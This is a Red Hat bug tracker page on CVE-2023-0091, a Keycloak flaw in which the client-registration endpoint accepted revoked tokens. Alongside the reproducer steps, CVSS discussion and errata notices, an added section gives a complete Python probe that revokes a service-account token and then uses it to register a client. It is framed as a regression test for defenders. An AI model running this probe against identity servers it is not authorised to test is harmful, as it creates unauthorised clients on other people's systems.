Bug 2158585 (CVE-2023-0091)

Summary: CVE-2023-0091 keycloak: Client Registration endpoint does not check token revocation
Product: [Other] Security Response
Reporter: mulliken
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: low
Priority: low
Version: unspecified
CC: boliveir, chazlett, drichtar, jkoops, pdelbell, pdrozd, peholase, pesilva, pjindal, pskopek, rmartinc, rowaters, sthorger
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Fixed In Version: keycloak 20.0.3
Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in Keycloak, where it did not properly check client tokens for possible revocation in its client credential flow. This flaw allows an attacker to access or modify potentially sensitive information.
Story Points: ---
Last Closed: 2023-03-02 01:50:58 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Category: ---
oVirt Team: ---
Cloudforms Team: ---
Bug Blocks: 2158586

Description mulliken 2023-01-05 18:56:21 UTC
/clients-registrations/openid-connect could consume an invalidated token and register a new client.

Reproducer:
1. Generate a token for service-account using the client_credentials flow
2. Revoke the token using the /revoke endpoint passing in the above token.
3. Now, invoke /clients-registrations/openid-connect passing in the above generated token for auth
4. A client is created using the token
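
The four reproducer steps above, as a runnable probe. This is an added example written for this page, not code from the bug report or from Keycloak. It assumes a realm with a confidential client whose service account is enabled, the Keycloak 17+ URL layout (no /auth prefix; set KC_BASE_URL to include /auth on older releases), and the hypothetical environment variables and client name used below. The interesting outcome is step 4: a 201 from /clients-registrations/openid-connect after the token was revoked means the endpoint is not checking revocation.

```python
#!/usr/bin/env python3
"""Regression probe for CVE-2023-0091: does the Keycloak client-registration
endpoint still honour an access token that has already been revoked?

Added example; not from the bug report or the Keycloak project. Assumes a
confidential client with a service account and the Keycloak >= 17 URL layout.
Environment variable names and the probe client name are hypothetical.
"""
from __future__ import annotations

import json
import os
import sys
import urllib.error
import urllib.parse
import urllib.request


def endpoints(base_url: str, realm: str) -> dict:
    """The three realm endpoints exercised by the reproducer."""
    root = f"{base_url.rstrip('/')}/realms/{realm}"
    return {
        "token": f"{root}/protocol/openid-connect/token",
        "revoke": f"{root}/protocol/openid-connect/revoke",
        "register": f"{root}/clients-registrations/openid-connect",
    }


def form_body(fields: dict) -> bytes:
    """application/x-www-form-urlencoded body for the token and revoke endpoints."""
    return urllib.parse.urlencode(fields).encode()


def send(method: str, url: str, data: bytes | None, headers: dict) -> tuple[int, str]:
    """Issue one request; HTTP error statuses are returned as data, not raised."""
    req = urllib.request.Request(url, data=data, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


def obtain_token(ep: dict, client_id: str, secret: str) -> str:
    """Step 1: client_credentials grant for the service account."""
    status, body = send("POST", ep["token"],
                        form_body({"grant_type": "client_credentials",
                                   "client_id": client_id, "client_secret": secret}),
                        {"Content-Type": "application/x-www-form-urlencoded"})
    if status != 200:
        sys.exit(f"token request failed: {status} {body}")
    return json.loads(body)["access_token"]


def revoke_token(ep: dict, client_id: str, secret: str, token: str) -> None:
    """Step 2: RFC 7009 revocation of that access token (client-authenticated)."""
    status, body = send("POST", ep["revoke"],
                        form_body({"token": token, "token_type_hint": "access_token",
                                   "client_id": client_id, "client_secret": secret}),
                        {"Content-Type": "application/x-www-form-urlencoded"})
    if status != 200:
        sys.exit(f"revocation failed: {status} {body}")


def try_register(ep: dict, token: str) -> tuple[int, str]:
    """Step 3: present the revoked token to the client-registration endpoint."""
    payload = json.dumps({"client_name": "cve-2023-0091-probe",  # hypothetical name
                          "redirect_uris": ["http://localhost/unused"]}).encode()
    return send("POST", ep["register"], payload,
                {"Content-Type": "application/json", "Authorization": f"Bearer {token}"})


def classify(status: int) -> str:
    """Step 4: a 201 means a client was created with a token that should be dead."""
    if status == 201:
        return "VULNERABLE: revoked token accepted, client registered"
    if status in (401, 403):
        return "not vulnerable: revoked token rejected"
    return f"inconclusive: unexpected status {status}"


def cleanup(registration_body: str) -> int:
    """Delete a probe client that a vulnerable server did create, using the
    registration_access_token the registration response hands back."""
    created = json.loads(registration_body)
    status, _ = send("DELETE", created["registration_client_uri"], None,
                     {"Authorization": f"Bearer {created['registration_access_token']}"})
    return status


if __name__ == "__main__":
    ep = endpoints(os.environ.get("KC_BASE_URL", "http://localhost:8080"),
                   os.environ.get("KC_REALM", "master"))
    cid, sec = os.environ["KC_CLIENT_ID"], os.environ["KC_CLIENT_SECRET"]
    tok = obtain_token(ep, cid, sec)
    revoke_token(ep, cid, sec, tok)
    status, body = try_register(ep, tok)
    print(classify(status))
    if status == 201:
        print("cleanup status:", cleanup(body))
```

Run it with KC_CLIENT_ID and KC_CLIENT_SECRET set for the service-account client; on a patched server (keycloak 20.0.3 or the RHSA builds listed below) step 3 returns 401 and nothing is created. The cleanup step matters on an unpatched server, because the probe otherwise leaves a live registered client behind.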

Comment 6 Patrick Del Bello 2023-02-22 14:37:29 UTC
CVSS Explanation on privileges required:

Privileges Required: (H) instead of (N)

The CVSS Metric for Privileges Required is expected to be "High". This is explained in the flaw description, since the attacker requires access to the access token that was meant to be revoked. This follows the CVSS Metric Definition: "The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable component allowing access to component-wide settings and files."
Considering the above information, a prior privilege is required before the attacker can jeopardize the environment.

Comment 7 errata-xmlrpc 2023-03-01 21:44:09 UTC
This issue has been addressed in the following products:

  Red Hat Single Sign-On 7.6 for RHEL 7

Via RHSA-2023:1043 https://access.redhat.com/errata/RHSA-2023:1043

Comment 8 errata-xmlrpc 2023-03-01 21:46:39 UTC
This issue has been addressed in the following products:

  Red Hat Single Sign-On 7.6 for RHEL 8

Via RHSA-2023:1044 https://access.redhat.com/errata/RHSA-2023:1044

Comment 9 errata-xmlrpc 2023-03-01 21:49:06 UTC
This issue has been addressed in the following products:

  Red Hat Single Sign-On 7.6 for RHEL 9

Via RHSA-2023:1045 https://access.redhat.com/errata/RHSA-2023:1045

Comment 10 errata-xmlrpc 2023-03-01 21:50:04 UTC
This issue has been addressed in the following products:

  RHEL-8 based Middleware Containers

Via RHSA-2023:1047 https://access.redhat.com/errata/RHSA-2023:1047

Comment 11 errata-xmlrpc 2023-03-01 22:00:13 UTC
This issue has been addressed in the following products:

  Red Hat Single Sign-On

Via RHSA-2023:1049 https://access.redhat.com/errata/RHSA-2023:1049

Comment 12 Product Security DevOps Team 2023-03-02 01:50:56 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2023-0091